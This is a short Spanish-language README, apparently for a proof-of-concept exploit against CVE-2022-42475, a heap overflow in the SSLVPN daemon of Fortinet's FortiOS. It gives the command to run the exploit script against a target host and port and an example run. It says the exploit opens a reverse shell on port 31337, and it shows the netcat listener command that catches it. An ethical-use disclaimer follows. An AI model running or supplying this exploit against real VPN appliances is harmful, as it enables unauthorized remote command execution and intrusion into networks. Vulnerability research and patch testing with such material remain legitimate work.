
Vulnerabilidad de desbordamiento de búfer en FortiOS
https://nvd.nist.gov/vuln/detail/CVE-2022-42475 Código POC para explotar el desbordamiento de montón (Heap overflow) en el demonio SSLVPN de Fortinet
Este es un POC rápido y sucio que probablemente no funcione en ningún lugar a menos que tengas mucha suerte. Depende de la versión y contiene algunos offsets hardcodeados que probablemente cambiarán de un sistema a otro.
python3 cve-2022-42475.py rhost rport lhost 'command'
python3 cve-2022-42475.py 192.168.10.1 8443 10.10.1.1 'ls -la /'
El POC utiliza un comando de Python para configurar una shell reversa en el puerto 31337
nc -lvnp 31337
Este proyecto está hecho únicamente con fines educativos y de pruebas éticas. El uso de esta herramienta para atacar objetivos sin consentimiento mutuo previo es ilegal. Los desarrolladores no asumen ninguna responsabilidad y no son responsables de cualquier mal uso o daño causado por esta herramienta.
Gracias a Alain M - Twitter : @plopz0r